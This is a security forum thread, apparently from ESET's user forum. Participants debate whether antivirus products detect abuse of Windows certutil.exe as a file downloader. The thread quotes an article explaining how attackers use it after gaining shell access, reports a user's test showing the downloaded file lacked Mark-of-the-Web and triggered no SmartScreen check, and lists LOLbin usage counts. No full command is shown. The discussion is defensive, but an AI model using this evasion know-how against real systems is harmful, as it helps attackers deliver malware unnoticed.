Jump to content

Recommended Posts

  • Administrators

ESET will not block powershell, java.exe, certutil.exe or whatever script interpreter or legitimate application just because it can be used to download both legit and malicious files. If the downloaded file was malicious, there's a very good chance it would be detected by ESET.

Administrators can see any download activities by certutil in ESET Inspect and can take actions automatically based on LiveGrid information about downloaded files for instance.

image.png

Link to comment
Share on other sites

The certutil.exe abuse shown in the uTube video is detailed here: https://bdure.medium.com/lets-defend-suspicious-certutil-exe-usage-eventid-113-93e379611663 .

Also, the attack is well known for sometime;

Quote

In 2017, Casey Smith, the same infosec researcher who told us about the risks in regsrv32, found a dual use for certutil. Smith noticed that certutil can be used to download a remote file.

This is not completely surprising since certutil has remote capabilities, but it’s clearly not checking the format of the file — effectively turning certutil into LoL-ware version of curl.

As it turns out, hackers were way ahead of the researchers. It was reported that Brazilians have been using certutil for some time.

So if hackers obtain shell access through, say, an SQL injection attack, they can use certutil to download, say, a remote PowerShell script to continue the attack — without triggering any virus or malware scanners searching for obvious hacking tools.

https://www.varonis.com/blog/the-malware-hiding-in-your-windows-system32-folder-part-iii-certutil-and-alternate-data-streams

Eset could create an internal HIPS rule to scan for such command line usage of certutil.exe.

Edited by itman
Link to comment
Share on other sites

1 hour ago, Marcos said:

Administrators can see any download activities by certutil in ESET Inspect and can take actions automatically based on LiveGrid information about downloaded files for instance.

Since Microsoft Defender on Win 10/11 can detect this activity, Eset consumer and Endpoint vers. via HIPS scanning should also detect it.

 

Link to comment
Share on other sites

  • Administrators
8 minutes ago, itman said:

Since Microsoft Defender on Win 10/11 can detect this activity, Eset consumer and Endpoint vers. via HIPS scanning should also detect it.

 

Yes, if the downloaded file was malicious I'd expect it to be detected.

Link to comment
Share on other sites

1 hour ago, Marcos said:

Yes, if the downloaded file was malicious I'd expect it to be detected.

Which means if the file was 0-day malware, you're nailed.

Link to comment
Share on other sites

Using one of the LOLbins Project example for certutil.exe, I ran it as standard user from command prompt. It ran w/o issue;

Cert_1.png.b83d26b68fc3e79bedfb6ab0443f89a1.png

Of note is the downloaded file had no MotW status associated with it. This means it would not be Microsoft Defender cloud  scanned. Also, no SmartScreen detection. Only thing displayed was an UAC alert to elevate to admin since the .exe is an installer with the alert noting untrusted publisher staus;

Cert_2.thumb.png.91cf2de8cbf82270d79adcb60039bfe1.png

Edited by itman
Link to comment
Share on other sites

3 hours ago, czesetfan said:

Doesn't this current testing just point to the questions in this topic? 

As far as malware sourced LOL bin use observed on their honeypot (I assume) for March (?);

what              count

cmd.exe            3609
svchost.exe    2154
sc.exe            765
rundll32.exe    747
iexplore.exe    735
tor.exe            718
consent.exe    630
schtasks.exe    563
wmiprvse.exe    363
PhoneExperienceHost.exe    357
powershell.exe    296
reg.exe            153
wscript.exe    129
taskkill.exe    103
msbuild.exe    80
ping.exe    56
control.exe    40
wmic.exe    40
csc.exe            26
regsvr32.exe    16
dism.exe    15
conhost.exe    13
taskhost.exe    13
net1.exe    8
attrib.exe    5
msiexec.exe    5
certutil.exe    4
mshta.exe    2
cscript.exe    1

No indication of how many of these samples, if any, were used in the March test. BTW - ESSP and Panda were the only tested products that missed a tested malware sample.

Edited by itman
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...